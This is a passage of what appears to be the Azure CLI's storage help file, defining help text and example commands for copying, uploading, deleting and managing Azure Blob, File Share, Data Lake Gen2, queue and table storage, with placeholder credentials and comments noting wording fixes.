- name: Copy an entire account data from blob account to another blob account, and you can also specify the storage account and container information of source and destination as above.
text: az storage copy -s https://[srcaccount].blob.core.windows.net -d https://[destaccount].blob.core.windows.net --recursive
- name: Copy a single object from S3 with access key to blob, and you can also specify your storage account and container information as above.
text: az storage copy -s https://s3.amazonaws.com/[bucket]/[object] -d https://[destaccount].blob.core.windows.net/[container]/[path/to/blob]
- name: Copy an entire directory from S3 with access key to blob virtual directory, and you can also specify your storage account and container information as above.
text: az storage copy -s https://s3.amazonaws.com/[bucket]/[folder] -d https://[destaccount].blob.core.windows.net/[container]/[path/to/directory] --recursive
- name: Copy all buckets in S3 service with access key to blob account, and you can also specify your storage account information as above.
text: az storage copy -s https://s3.amazonaws.com/ -d https://[destaccount].blob.core.windows.net --recursive
- name: Copy all buckets in a S3 region with access key to blob account, and you can also specify your storage account information as above.
text: az storage copy -s https://s3-[region].amazonaws.com/ -d https://[destaccount].blob.core.windows.net --recursive
- name: Upload a single file to Azure File Share using url.
text: az storage copy -s /path/to/file.txt -d https://[account].file.core.windows.net/[share]/[path/to/file]
- name: Upload a single file to Azure File Share using account name and share name.
text: az storage copy --source-local-path /path/to/file.txt --destination-account-name mystorageaccount --destination-share myshare
- name: Upload an entire directory to Azure File Share using url.
text: az storage copy -s /path/to/dir -d https://[account].file.core.windows.net/[share]/[path/to/directory] --recursive
- name: Upload an entire directory to Azure File Share using account name and container name.
text: az storage copy --source-local-path /path/to/dir --destination-account-name mystorageaccount --destination-share myshare --recursive
- name: Upload a set of files to Azure File Share using wildcards with account name and share name.
text: az storage copy --source-local-path /path/*foo/*bar/*.pdf --destination-account-name mystorageaccount --destination-share myshare
- name: Upload files and directories to Azure File Share using wildcards with url.
text: az storage copy -s /path/*foo/*bar* -d https://[account].file.core.windows.net/[share]/[path/to/directory] --recursive
- name: Upload files and directories to Azure File Share using wildcards with account name and share name.
text: az storage copy --source-local-path /path/*foo/*bar* --destination-account-name mystorageaccount --destination-share myshare --recursive
- name: Download a single file from Azure File Share using url, and you can also specify your storage account and share information as above.
text: az storage copy -s https://[account].file.core.windows.net/[share]/[path/to/file] -d /path/to/file.txt
- name: Download an entire directory from Azure File Share, and you can also specify your storage account and share information as above.
text: az storage copy -s https://[account].file.core.windows.net/[share]/[path/to/directory] -d /path/to/dir --recursive
- name: Download a set of files from Azure File Share using wildcards, and you can also specify your storage account and share information as above.
text: az storage copy -s https://[account].file.core.windows.net/[share]/ --include-pattern foo* -d /path/to/dir --recursive
"""
helps['storage cors'] = """
type: group
short-summary: Manage storage service Cross-Origin Resource Sharing (CORS).
"""
helps['storage cors add'] = """
type: command
short-summary: Add a CORS rule to a storage account.
parameters:
- name: --services
short-summary: >
The storage service(s) to add rules to. Allowed options are: (b)lob, (f)ile,
(q)ueue, (t)able. Can be combined.
- name: --max-age
short-summary: The maximum number of seconds the client/browser should cache a preflight response.
- name: --origins
short-summary: Space-separated list of origin domains that will be allowed via CORS, or '*' to allow all domains.
- name: --methods
short-summary: Space-separated list of HTTP methods allowed to be executed by the origin.
- name: --allowed-headers
short-summary: Space-separated list of response headers allowed to be part of the cross-origin request.
- name: --exposed-headers
short-summary: Space-separated list of response headers to expose to CORS clients.
"""
helps['storage cors clear'] = """
type: command
short-summary: Remove all CORS rules from a storage account.
parameters:
- name: --services
short-summary: >
The storage service(s) to remove rules from. Allowed options are: (b)lob, (f)ile,
(q)ueue, (t)able. Can be combined.
examples:
- name: Remove all CORS rules from a storage account. (autogenerated)
text: |
az storage cors clear --account-name MyAccount --services bfqt
crafted: true
"""
helps['storage cors list'] = """
type: command
short-summary: List all CORS rules for a storage account.
parameters:
- name: --services
short-summary: >
The storage service(s) to list rules for. Allowed options are: (b)lob, (f)ile,
(q)ueue, (t)able. Can be combined.
examples:
- name: List all CORS rules for a storage account. (autogenerated)
text: |
az storage cors list --account-key 00000000 --account-name mystorageaccount
crafted: true
"""
helps['storage directory'] = """
type: group
short-summary: Manage file storage directories.
"""
helps['storage directory exists'] = """
type: command
short-summary: Check for the existence of a storage directory.
examples:
- name: Check for the existence of a storage directory. (autogenerated)
text: |
az storage directory exists --account-key 00000000 --account-name MyAccount --name MyDirectory --share-name MyShare
crafted: true
"""
helps['storage directory list'] = """
type: command
short-summary: List directories in a share.
examples:
- name: List directories in a share. (autogenerated)
text: |
az storage directory list --account-key 00000000 --account-name MyAccount --share-name MyShare
crafted: true
"""
helps['storage directory metadata'] = """
type: group
short-summary: Manage file storage directory metadata.
"""
helps['storage entity'] = """
type: group
short-summary: Manage table storage entities.
"""
helps['storage entity insert'] = """
type: command
short-summary: Insert an entity into a table.
parameters:
- name: --table-name -t
type: string
short-summary: The name of the table to insert the entity into.
- name: --entity -e
type: list
short-summary: Space-separated list of key=value pairs. Must contain a PartitionKey and a RowKey.
long-summary: The PartitionKey and RowKey must be unique within the table, and may be up to 64Kb in size. If using an integer value as a key, convert it to a fixed-width string which can be canonically sorted. For example, convert the integer value 1 to the string value "0000001" to ensure proper sorting.
- name: --if-exists
type: string
short-summary: Behavior when an entity already exists for the specified PartitionKey and RowKey.
- name: --timeout
short-summary: The server timeout, expressed in seconds.
examples:
- name: Insert an entity into a table. (autogenerated)
text: |
az storage entity insert --connection-string $connectionString --entity PartitionKey=AAA RowKey=BBB Content=ASDF2 --if-exists fail --table-name MyTable
crafted: true
"""
helps['storage entity query'] = """
type: command
short-summary: List entities which satisfy a query.
parameters:
- name: --marker
type: list
short-summary: Space-separated list of key=value pairs. Must contain a nextpartitionkey and a nextrowkey.
long-summary: This value can be retrieved from the next_marker field of a previous generator object if max_results was specified and that generator has finished enumerating results. If specified, this generator will begin returning results from the point where the previous generator stopped.
examples:
- name: List entities which satisfy a query. (autogenerated)
text: |
az storage entity query --table-name MyTable
crafted: true
"""
helps['storage file'] = """
type: group
short-summary: Manage file shares that use the SMB 3.0 protocol.
"""
helps['storage file copy'] = """
type: group
short-summary: Manage file copy operations.
"""
helps['storage file copy start'] = """
type: command
short-summary: Copy a file asynchronously.
examples:
- name: Copy a file asynchronously.
text: |
az storage file copy start --source-account-name srcaccount --source-account-key 00000000 --source-path <srcpath-to-file> --source-share srcshare --destination-path <destpath-to-file> --destination-share destshare --account-name destaccount --account-key 00000000
- name: Copy a file asynchronously from source uri to destination storage account with sas token.
text: |
        az storage file copy start --source-uri "https://srcaccount.file.core.windows.net/myshare/mydir/myfile?<sastoken>" --destination-path <destpath-to-file> --destination-share destshare --account-name destaccount --sas-token <destination-sas>
- name: Copy a file asynchronously from file snapshot to destination storage account with sas token.
text: |
        az storage file copy start --source-account-name srcaccount --source-account-key 00000000 --source-path <srcpath-to-file> --source-share srcshare --file-snapshot "2020-03-02T13:51:54.0000000Z" --destination-path <destpath-to-file> --destination-share destshare --account-name destaccount --sas-token <destination-sas>
"""
helps['storage file copy start-batch'] = """
type: command
short-summary: Copy multiple files or blobs to a file share.
parameters:
- name: --destination-share
type: string
short-summary: The file share where the source data is copied to.
- name: --destination-path
type: string
short-summary: The directory where the source data is copied to. If omitted, data is copied to the root directory.
- name: --pattern
type: string
short-summary: The pattern used for globbing files and blobs. The supported patterns are '*', '?', '[seq]', and '[!seq]'. For more information, please refer to https://docs.python.org/3.7/library/fnmatch.html.
    long-summary: When you use '*' in --pattern, it will match any character including the directory separator '/'.
- name: --dryrun
type: bool
short-summary: List the files and blobs to be copied. No actual data transfer will occur.
- name: --source-account-name
type: string
short-summary: The source storage account to copy the data from. If omitted, the destination account is used.
- name: --source-account-key
type: string
short-summary: The account key for the source storage account. If omitted, the active login is used to determine the account key.
- name: --source-container
type: string
short-summary: The source container blobs are copied from.
- name: --source-share
type: string
short-summary: The source share files are copied from.
- name: --source-uri
type: string
    short-summary: A URI that specifies the source file share or blob container.
long-summary: If the source is in another account, the source must either be public or authenticated via a shared access signature.
- name: --source-sas
type: string
short-summary: The shared access signature for the source storage account.
examples:
- name: Copy all files in a file share to another storage account.
text: |
az storage file copy start-batch --source-account-name srcaccount --source-account-key 00000000 --source-share srcshare --destination-path <destpath-to-directory> --destination-share destshare --account-name destaccount --account-key 00000000
  - name: Copy all files in a file share to another storage account with sas token.
text: |
        az storage file copy start-batch --source-uri "https://srcaccount.file.core.windows.net/myshare?<sastoken>" --destination-path <destpath-to-directory> --destination-share destshare --account-name destaccount --sas-token <destination-sas>
"""
helps['storage file delete-batch'] = """
type: command
short-summary: Delete files from an Azure Storage File Share.
parameters:
- name: --source -s
type: string
short-summary: The source of the file delete operation. The source can be the file share URL or the share name.
- name: --pattern
type: string
short-summary: The pattern used for file globbing. The supported patterns are '*', '?', '[seq]', and '[!seq]'. For more information, please refer to https://docs.python.org/3.7/library/fnmatch.html.
    long-summary: When you use '*' in --pattern, it will match any character including the directory separator '/'.
- name: --dryrun
type: bool
short-summary: List the files and blobs to be deleted. No actual data deletion will occur.
examples:
- name: Delete files from an Azure Storage File Share. (autogenerated)
text: |
az storage file delete-batch --account-key 00000000 --account-name MyAccount --source /path/to/file
crafted: true
- name: Delete files from an Azure Storage File Share. (autogenerated)
text: |
az storage file delete-batch --account-key 00000000 --account-name MyAccount --pattern *.py --source /path/to/file
crafted: true
"""
helps['storage file download-batch'] = """
type: command
short-summary: Download files from an Azure Storage File Share to a local directory in a batch operation.
parameters:
- name: --source -s
type: string
short-summary: The source of the file download operation. The source can be the file share URL or the share name.
- name: --destination -d
type: string
short-summary: The local directory where the files are downloaded to. This directory must already exist.
- name: --pattern
type: string
short-summary: The pattern used for file globbing. The supported patterns are '*', '?', '[seq]', and '[!seq]'. For more information, please refer to https://docs.python.org/3.7/library/fnmatch.html.
    long-summary: When you use '*' in --pattern, it will match any character including the directory separator '/'.
- name: --dryrun
type: bool
short-summary: List the files and blobs to be downloaded. No actual data transfer will occur.
- name: --max-connections
type: integer
short-summary: The maximum number of parallel connections to use. Default value is 1.
- name: --snapshot
type: string
short-summary: A string that represents the snapshot version, if applicable.
- name: --validate-content
type: bool
short-summary: If set, calculates an MD5 hash for each range of the file for validation.
long-summary: >
The storage service checks the hash of the content that has arrived is identical to the hash that was sent.
This is mostly valuable for detecting bitflips during transfer if using HTTP instead of HTTPS. This hash is not stored.
examples:
- name: Download files from an Azure Storage File Share to a local directory in a batch operation. (autogenerated)
text: |
az storage file download-batch --account-key 00000000 --account-name MyAccount --destination . --no-progress --source /path/to/file
crafted: true
"""
helps['storage file exists'] = """
type: command
short-summary: Check for the existence of a file.
examples:
- name: Check for the existence of a file. (autogenerated)
text: |
az storage file exists --account-key 00000000 --account-name MyAccount --path path/file.txt --share-name MyShare
crafted: true
- name: Check for the existence of a file. (autogenerated)
text: |
az storage file exists --connection-string $connectionString --path path/file.txt --share-name MyShare
crafted: true
"""
helps['storage file generate-sas'] = """
type: command
examples:
- name: Generate a sas token for a file.
text: |
end=`date -u -d "30 minutes" '+%Y-%m-%dT%H:%MZ'`
az storage file generate-sas -p path/file.txt -s MyShare --account-name MyStorageAccount --permissions rcdw --https-only --expiry $end
- name: Generate a shared access signature for the file. (autogenerated)
text: |
az storage file generate-sas --account-name MyStorageAccount --expiry 2037-12-31T23:59:00Z --path path/file.txt --permissions rcdw --share-name MyShare --start 2019-01-01T12:20Z
crafted: true
"""
helps['storage file list'] = """
type: command
short-summary: List files and directories in a share.
parameters:
- name: --exclude-dir
type: bool
short-summary: List only files in the given share.
examples:
- name: List files and directories in a share. (autogenerated)
text: |
az storage file list --share-name MyShare
crafted: true
"""
helps['storage file metadata'] = """
type: group
short-summary: Manage file metadata.
"""
helps['storage file upload'] = """
type: command
short-summary: Upload a file to a share that uses the SMB 3.0 protocol.
long-summary: Creates or updates an Azure file from a source path with automatic chunking and progress notifications.
examples:
  - name: Upload a local file to a share.
text: az storage file upload -s MyShare --source /path/to/file
- name: Upload a file to a share that uses the SMB 3.0 protocol. (autogenerated)
text: |
az storage file upload --account-key 00000000 --account-name MyStorageAccount --path path/file.txt --share-name MyShare --source /path/to/file
crafted: true
"""
# Help entry for `az storage file upload-batch`.
# Fix: duplicated word in the --pattern long-summary ("the the" -> "the").
helps['storage file upload-batch'] = """
type: command
short-summary: Upload files from a local directory to an Azure Storage File Share in a batch operation.
parameters:
- name: --source -s
type: string
short-summary: The directory to upload files from.
- name: --destination -d
type: string
short-summary: The destination of the upload operation.
long-summary: The destination can be the file share URL or the share name. When the destination is the share URL, the storage account name is parsed from the URL.
- name: --destination-path
type: string
short-summary: The directory where the source data is copied to. If omitted, data is copied to the root directory.
- name: --pattern
type: string
short-summary: The pattern used for file globbing. The supported patterns are '*', '?', '[seq]', and '[!seq]'. For more information, please refer to https://docs.python.org/3.7/library/fnmatch.html.
long-summary: When you use '*' in --pattern, it will match any character including the directory separator '/'.
- name: --dryrun
type: bool
short-summary: List the files and blobs to be uploaded. No actual data transfer will occur.
- name: --max-connections
type: integer
short-summary: The maximum number of parallel connections to use. Default value is 1.
- name: --validate-content
type: bool
short-summary: If set, calculates an MD5 hash for each range of the file for validation.
long-summary: >
The storage service checks the hash of the content that has arrived is identical to the hash that was sent.
This is mostly valuable for detecting bitflips during transfer if using HTTP instead of HTTPS. This hash is not stored.
examples:
- name: Upload files from a local directory to an Azure Storage File Share in a batch operation. (autogenerated)
text: |
az storage file upload-batch --account-key 00000000 --account-name MyAccount --destination . --source /path/to/file
crafted: true
"""
# Help entries: `az storage file url` plus the `storage fs` / `storage fs access`
# command-group summaries (ADLS Gen2 surface starts here).
helps['storage file url'] = """
type: command
short-summary: Create the url to access a file.
examples:
- name: Create the url to access a file. (autogenerated)
text: |
az storage file url --account-name MyAccount --path path/file.txt --share-name MyShare
crafted: true
"""
helps['storage fs'] = """
type: group
short-summary: Manage file systems in Azure Data Lake Storage Gen2 account.
"""
helps['storage fs access'] = """
type: group
short-summary: Manage file system access and permissions for Azure Data Lake Storage Gen2 account.
"""
# Help entry for `az storage fs access set`.
# Fixes: (1) --acl's short-summary said "Invalid in conjunction with acl" —
# self-contradictory; the ADLS setAccessControl operation rejects acl combined
# with permissions, so it now says "Invalid in conjunction with permissions."
# (2) stray trailing apostrophe after "notation (e.g. 0766) are supported."
helps['storage fs access set'] = """
type: command
short-summary: Set the access control properties of a path(directory or file) in Azure Data Lake Storage Gen2 account.
parameters:
- name: --acl
short-summary: Invalid in conjunction with permissions. POSIX access control rights on files and directories in the format "[scope:][type]:[id]:[permissions]". e.g. "user::rwx,group::r--,other::---,mask::rwx".
long-summary: >
The value is a comma-separated list of access control entries. Each access control entry (ACE) consists of a scope,
a type, a user or group identifier, and permissions in the format "[scope:][type]:[id]:[permissions]".
The scope must be "default" to indicate the ACE belongs to the default ACL for a directory;
otherwise scope is implicit and the ACE belongs to the access ACL. There are four ACE types:
"user" grants rights to the owner or a named user, "group" grants rights to the owning group
or a named group, "mask" restricts rights granted to named users and the members of groups,
and "other" grants rights to all users not found in any of the other entries.
The user or group identifier is omitted for entries of type "mask" and "other".
The user or group identifier is also omitted for the owner and owning group.
For example, the following ACL grants read, write, and execute rights to the file owner an
john.doe@contoso, the read right to the owning group, and nothing to everyone else:
"user::rwx,user:john.doe@contoso:rwx,group::r--,other::---,mask::rwx".
For more information, please refer to https://docs.microsoft.com/en-us/azure/storage/blobs/data-lake-storage-access-control.
- name: --permissions
short-summary: >
Invalid in conjunction with acl. POSIX access permissions for the file owner, the file owning group, and others.
Each class may be granted read(r), write(w), or execute(x) permission. Both symbolic (rwxrw-rw-) and 4-digit octal
notation (e.g. 0766) are supported.
- name: --owner
short-summary: >
The owning user of the file or directory. The user Azure Active Directory object ID or user principal name to
set as the owner. For more information, please refer to
https://docs.microsoft.com/en-us/azure/storage/blobs/data-lake-storage-access-control#the-owning-user.
- name: --group
short-summary: >
The owning group of the file or directory. The group Azure Active Directory object ID or user principal name to
set as the owning group. For more information, please refer to
https://docs.microsoft.com/en-us/azure/storage/blobs/data-lake-storage-access-control#changing-the-owning-group.
examples:
- name: Set the access control list of a path.
text: az storage fs access set --acl "user::rwx,group::r--,other::---" -p dir -f myfilesystem --account-name mystorageaccount --account-key 0000-0000
- name: Set permissions of a path.
text: az storage fs access set --permissions "rwxrwx---" -p dir -f myfilesystem --account-name mystorageaccount --account-key 0000-0000
- name: Set owner of a path.
text: az storage fs access set --owner example@microsoft.com -p dir -f myfilesystem --account-name mystorageaccount --account-key 0000-0000
- name: Set owning group of a path.
text: az storage fs access set --group 68390a19-a897-236b-b453-488abf67b4dc -p dir -f myfilesystem --account-name mystorageaccount --account-key 0000-0000
"""
# Help entries for `az storage fs` file-system lifecycle commands and the
# `storage fs directory` subgroup (create/delete/exists/list/metadata).
helps['storage fs access show'] = """
type: command
short-summary: Show the access control properties of a path (directory or file) in Azure Data Lake Storage Gen2 account.
examples:
- name: Show the access control properties of a path.
text: az storage fs access show -p dir -f myfilesystem --account-name myadlsaccount --account-key 0000-0000
"""
helps['storage fs create'] = """
type: command
short-summary: Create file system for Azure Data Lake Storage Gen2 account.
examples:
- name: Create file system for Azure Data Lake Storage Gen2 account.
text: |
az storage fs create -n fsname --account-name mystorageaccount --account-key 0000-0000
- name: Create file system for Azure Data Lake Storage Gen2 account and enable public access.
text: |
az storage fs create -n fsname --public-access file --account-name mystorageaccount --account-key 0000-0000
"""
helps['storage fs delete'] = """
type: command
short-summary: Delete a file system in ADLS Gen2 account.
examples:
- name: Delete a file system in ADLS Gen2 account.
text: az storage fs delete -n myfilesystem --account-name myadlsaccount --account-key 0000-0000
"""
helps['storage fs exists'] = """
type: command
short-summary: Check for the existence of a file system in ADLS Gen2 account.
examples:
- name: Check for the existence of a file system in ADLS Gen2 account.
text: az storage fs exists -n myfilesystem --account-name myadlsaccount --account-key 0000-0000
"""
helps['storage fs list'] = """
type: command
short-summary: List file systems in ADLS Gen2 account.
examples:
- name: List file systems in ADLS Gen2 account.
text: az storage fs list --account-name myadlsaccount --account-key 0000-0000
"""
helps['storage fs show'] = """
type: command
short-summary: Show properties of file system in ADLS Gen2 account.
examples:
- name: Show properties of file system in ADLS Gen2 account.
text: az storage fs show -n myfilesystem --account-name myadlsaccount --account-key 0000-0000
"""
# Directory-level commands within an ADLS Gen2 file system.
helps['storage fs directory'] = """
type: group
short-summary: Manage directories in Azure Data Lake Storage Gen2 account.
"""
helps['storage fs directory create'] = """
type: command
short-summary: Create a directory in ADLS Gen2 file system.
examples:
- name: Create a directory in ADLS Gen2 file system.
text: az storage fs directory create -n dir -f myfilesystem --account-name myadlsaccount --account-key 0000-0000
- name: Create a directory in ADLS Gen2 file system through connection string.
text: az storage fs directory create -n dir -f myfilesystem --connection-string myconnectionstring
"""
helps['storage fs directory delete'] = """
type: command
short-summary: Delete a directory in ADLS Gen2 file system.
examples:
- name: Delete a directory in ADLS Gen2 file system.
text: az storage fs directory delete -n dir -f myfilesystem --account-name myadlsaccount --account-key 0000-0000
"""
helps['storage fs directory exists'] = """
type: command
short-summary: Check for the existence of a directory in ADLS Gen2 file system.
examples:
- name: Check for the existence of a directory in ADLS Gen2 file system.
text: az storage fs directory exists -n dir -f myfilesystem --account-name myadlsaccount --account-key 0000-0000
"""
helps['storage fs directory list'] = """
type: command
short-summary: List directories in ADLS Gen2 file system.
examples:
- name: List directories in ADLS Gen2 file system.
text: az storage fs directory list -f myfilesystem --account-name myadlsaccount --account-key 0000-0000
- name: List directories in "dir/" for ADLS Gen2 file system.
text: az storage fs directory list --path dir -f myfilesystem --account-name myadlsaccount --account-key 0000-0000
"""
helps['storage fs directory metadata'] = """
type: group
short-summary: Manage the metadata for directory in file system.
"""
helps['storage fs directory metadata show'] = """
type: command
short-summary: Return all user-defined metadata for the specified directory.
examples:
- name: Return all user-defined metadata for the specified directory.
text: az storage fs directory metadata show -n dir -f myfilesystem --account-name myadlsaccount --account-key 0000-0000
"""
# Help entry for `az storage fs directory move`.
# Fix: duplicated phrase in example name ("Move a directory a directory ...").
helps['storage fs directory move'] = """
type: command
short-summary: Move a directory in ADLS Gen2 file system.
examples:
- name: Move a directory in ADLS Gen2 file system.
text: az storage fs directory move --new-directory newfs/dir -n dir -f myfilesystem --account-name myadlsaccount --account-key 0000-0000
"""
# Help entries: `storage fs directory show` plus the `storage fs file` subgroup
# (append/create/delete/download/exists/list and its metadata group).
helps['storage fs directory show'] = """
type: command
short-summary: Show properties of a directory in ADLS Gen2 file system.
examples:
- name: Show properties of a directory in ADLS Gen2 file system.
text: az storage fs directory show -n dir -f myfilesystem --account-name myadlsaccount --account-key 0000-0000
- name: Show properties of a subdirectory in ADLS Gen2 file system.
text: az storage fs directory show -n dir/subdir -f myfilesystem --account-name myadlsaccount --account-key 0000-0000
"""
helps['storage fs file'] = """
type: group
short-summary: Manage files in Azure Data Lake Storage Gen2 account.
"""
helps['storage fs file append'] = """
type: command
short-summary: Append content to a file in ADLS Gen2 file system.
examples:
- name: Append content to a file in ADLS Gen2 file system.
text: |
az storage fs file append --content "test content test" -p dir/a.txt -f fsname --account-name myadlsaccount --account-key 0000-0000
"""
helps['storage fs file create'] = """
type: command
short-summary: Create a new file in ADLS Gen2 file system.
examples:
- name: Create a new file in ADLS Gen2 file system.
text: |
az storage fs file create -p dir/a.txt -f fsname --account-name myadlsaccount --account-key 0000-0000
"""
helps['storage fs file delete'] = """
type: command
short-summary: Delete a file in ADLS Gen2 file system.
examples:
- name: Delete a file in ADLS Gen2 file system.
text: |
az storage fs file delete -p dir/a.txt -f fsname --account-name myadlsaccount --account-key 0000-0000
"""
helps['storage fs file download'] = """
type: command
short-summary: Download a file from the specified path in ADLS Gen2 file system.
examples:
- name: Download a file in ADLS Gen2 file system to current path.
text: |
az storage fs file download -p dir/a.txt -f fsname --account-name myadlsaccount --account-key 0000-0000
- name: Download a file in ADLS Gen2 file system to a specified directory.
text: |
az storage fs file download -p dir/a.txt -d test/ -f fsname --account-name myadlsaccount --account-key 0000-0000
- name: Download a file in ADLS Gen2 file system to a specified file path.
text: |
az storage fs file download -p dir/a.txt -d test/b.txt -f fsname --account-name myadlsaccount --account-key 0000-0000
"""
helps['storage fs file exists'] = """
type: command
short-summary: Check for the existence of a file in ADLS Gen2 file system.
examples:
- name: Check for the existence of a file in ADLS Gen2 file system.
text: |
az storage fs file exists -p dir/a.txt -f fsname --account-name myadlsaccount --account-key 0000-0000
"""
helps['storage fs file list'] = """
type: command
short-summary: List files and directories in ADLS Gen2 file system.
examples:
- name: List files and directories in ADLS Gen2 file system.
text: |
az storage fs file list -f fsname --account-name myadlsaccount --account-key 0000-0000
- name: List files in ADLS Gen2 file system.
text: |
az storage fs file list --exclude-dir -f fsname --account-name myadlsaccount --account-key 0000-0000
- name: List files and directories in a specified path.
text: |
az storage fs file list --path dir -f fsname --account-name myadlsaccount --account-key 0000-0000
- name: List files and directories from a specific marker.
text: |
az storage fs file list --marker "VBaS6LvPufaqrTANTQvbmV3dHJ5FgAAAA==" -f fsname --account-name myadlsaccount --account-key 0000-0000
"""
helps['storage fs file metadata'] = """
type: group
short-summary: Manage the metadata for file in file system.
"""
# Help entry for `az storage fs file metadata show`.
# BUGFIX: this entry was keyed 'storage fs metadata show' even though its
# summary and example document the file-level command; the file-system-level
# 'storage fs metadata show' is (correctly) defined further below, so this
# assignment was being silently overwritten and the file command lost its help.
helps['storage fs file metadata show'] = """
type: command
short-summary: Return all user-defined metadata for the specified file.
examples:
- name: Return all user-defined metadata for the specified file.
text: az storage fs file metadata show -p dir/a.txt -f fsname --account-name myadlsaccount --account-key 0000-0000
"""
# Help entries: remaining `storage fs file` commands, `storage fs metadata`,
# then the `storage logging`, `storage message`, `storage metrics`, and
# `storage queue` command groups.
helps['storage fs file move'] = """
type: command
short-summary: Move a file in ADLS Gen2 Account.
examples:
- name: Move a file in ADLS Gen2 Account.
text: |
az storage fs file move --new-path new-fs/new-dir/b.txt -p dir/a.txt -f fsname --account-name myadlsaccount --account-key 0000-0000
"""
helps['storage fs file show'] = """
type: command
short-summary: Show properties of file in ADLS Gen2 file system.
examples:
- name: Show properties of file in ADLS Gen2 file system.
text: |
az storage fs file show -p dir/a.txt -f fsname --account-name myadlsaccount --account-key 0000-0000
"""
helps['storage fs file upload'] = """
type: command
short-summary: Upload a file to a file path in ADLS Gen2 file system.
examples:
- name: Upload a file from local path to a file path in ADLS Gen2 file system.
text: |
az storage fs file upload --source a.txt -p dir/a.txt -f fsname --account-name myadlsaccount --account-key 0000-0000
"""
helps['storage fs metadata'] = """
type: group
short-summary: Manage the metadata for file system.
"""
helps['storage fs metadata show'] = """
type: command
short-summary: Return all user-defined metadata for the specified file system.
examples:
- name: Return all user-defined metadata for the specified file system.
text: az storage fs metadata show -n myfilesystem --account-name myadlsaccount --account-key 0000-0000
"""
# Classic storage-analytics logging commands.
helps['storage logging'] = """
type: group
short-summary: Manage storage service logging information.
"""
helps['storage logging off'] = """
type: command
short-summary: Turn off logging for a storage account.
parameters:
- name: --services
short-summary: 'The storage services from which to retrieve logging info: (b)lob (q)ueue (t)able. Can be combined.'
examples:
- name: Turn off logging for a storage account.
text: |
az storage logging off --account-name MyAccount
"""
helps['storage logging show'] = """
type: command
short-summary: Show logging settings for a storage account.
parameters:
- name: --services
short-summary: 'The storage services from which to retrieve logging info: (b)lob (q)ueue (t)able. Can be combined.'
examples:
- name: Show logging settings for a storage account. (autogenerated)
text: |
az storage logging show --account-name MyAccount --services qt
crafted: true
"""
helps['storage logging update'] = """
type: command
short-summary: Update logging settings for a storage account.
parameters:
- name: --services
short-summary: 'The storage service(s) for which to update logging info: (b)lob (q)ueue (t)able. Can be combined.'
- name: --log
short-summary: 'The operations for which to enable logging: (r)ead (w)rite (d)elete. Can be combined.'
- name: --retention
short-summary: Number of days for which to retain logs. 0 to disable.
- name: --version
short-summary: Version of the logging schema.
"""
helps['storage message'] = """
type: group
short-summary: Manage queue storage messages.
long-summary: >
Please specify one of the following authentication parameters for your commands: --auth-mode, --account-key,
--connection-string, --sas-token. You also can use corresponding environment variables to store your authentication
credentials, e.g. AZURE_STORAGE_KEY, AZURE_STORAGE_CONNECTION_STRING and AZURE_STORAGE_SAS_TOKEN.
"""
helps['storage metrics'] = """
type: group
short-summary: Manage storage service metrics.
"""
helps['storage metrics show'] = """
type: command
short-summary: Show metrics settings for a storage account.
parameters:
- name: --services
short-summary: 'The storage services from which to retrieve metrics info: (b)lob (q)ueue (t)able. Can be combined.'
- name: --interval
short-summary: Filter the set of metrics to retrieve by time interval
examples:
- name: Show metrics settings for a storage account. (autogenerated)
text: |
az storage metrics show --account-key 00000000 --account-name MyAccount
crafted: true
"""
helps['storage metrics update'] = """
type: command
short-summary: Update metrics settings for a storage account.
parameters:
- name: --services
short-summary: 'The storage services from which to retrieve metrics info: (b)lob (q)ueue (t)able. Can be combined.'
- name: --hour
short-summary: Update the hourly metrics
- name: --minute
short-summary: Update the by-minute metrics
- name: --api
short-summary: Specify whether to include API in metrics. Applies to both hour and minute metrics if both are specified. Must be specified if hour or minute metrics are enabled and being updated.
- name: --retention
short-summary: Number of days for which to retain metrics. 0 to disable. Applies to both hour and minute metrics if both are specified.
examples:
- name: Update metrics settings for a storage account. (autogenerated)
text: |
az storage metrics update --account-name MyAccount --api true --hour true --minute true --retention 10 --services bfqt
crafted: true
- name: Update metrics settings for a storage account. (autogenerated)
text: |
az storage metrics update --api true --connection-string $connectionString --hour true --minute true --retention 10 --services bfqt
crafted: true
"""
helps['storage queue'] = """
type: group
short-summary: Manage storage queues.
"""
helps['storage queue list'] = """
type: command
short-summary: List queues in a storage account.
"""
helps['storage queue metadata'] = """
type: group
short-summary: Manage the metadata for a storage queue.
"""
helps['storage queue policy'] = """
type: group
short-summary: Manage shared access policies for a storage queue.
"""
# Help entry for `az storage remove`.
# BUGFIX: two example name/text pairs were swapped — "Remove only the top blobs
# ... but not its sub-directories" showed `--recursive` (which deletes
# sub-directories too), while "Remove all the blobs in a Storage Container"
# showed a directory-scoped `-n path/to/directory` command. Texts exchanged so
# each command matches its description.
helps['storage remove'] = """
type: command
short-summary: Delete blobs or files from Azure Storage.
examples:
- name: Remove a single blob.
text: az storage remove -c MyContainer -n MyBlob
- name: Remove an entire virtual directory.
text: az storage remove -c MyContainer -n path/to/directory --recursive
- name: Remove only the top blobs inside a virtual directory but not its sub-directories.
text: az storage remove -c MyContainer -n path/to/directory
- name: Remove all the blobs in a Storage Container.
text: az storage remove -c MyContainer --recursive
- name: Remove a subset of blobs in a virtual directory (For example, only jpg and pdf files, or if the blob name is "exactName" and file names don't start with "test").
text: az storage remove -c MyContainer --include-path path/to/directory --include-pattern "*.jpg;*.pdf;exactName" --exclude-pattern "test*" --recursive
- name: Remove an entire virtual directory but exclude certain blobs from the scope (For example, every blob that starts with foo or ends with bar).
text: az storage remove -c MyContainer --include-path path/to/directory --exclude-pattern "foo*;*bar" --recursive
- name: Remove a single file.
text: az storage remove -s MyShare -p MyFile
- name: Remove an entire directory.
text: az storage remove -s MyShare -p path/to/directory --recursive
- name: Remove all the files in a Storage File Share.
text: az storage remove -s MyShare --recursive
"""
# Help entries: the `storage share-rm` group (resource-provider file shares),
# the `storage share` data-plane group, and the `storage table` group.
helps['storage share-rm'] = """
type: group
short-summary: Manage Azure file shares using the Microsoft.Storage resource provider.
"""
helps['storage share-rm create'] = """
type: command
short-summary: Create a new Azure file share under the specified storage account.
examples:
- name: Create a new Azure file share 'myfileshare' with metadata and quota as 10 GB under the storage account 'mystorageaccount'(account name) in resource group 'MyResourceGroup'.
text: az storage share-rm create -g MyResourceGroup --storage-account mystorageaccount --name myfileshare --quota 10 --metadata key1=value1 key2=value2
- name: Create a new Azure file share 'myfileshare' with metadata and quota as 6000 GB under the storage account 'mystorageaccount'(account name) which enables large file share in resource group 'MyResourceGroup'.
text: |
az storage account update -g MyResourceGroup --name mystorageaccount --enable-large-file-share
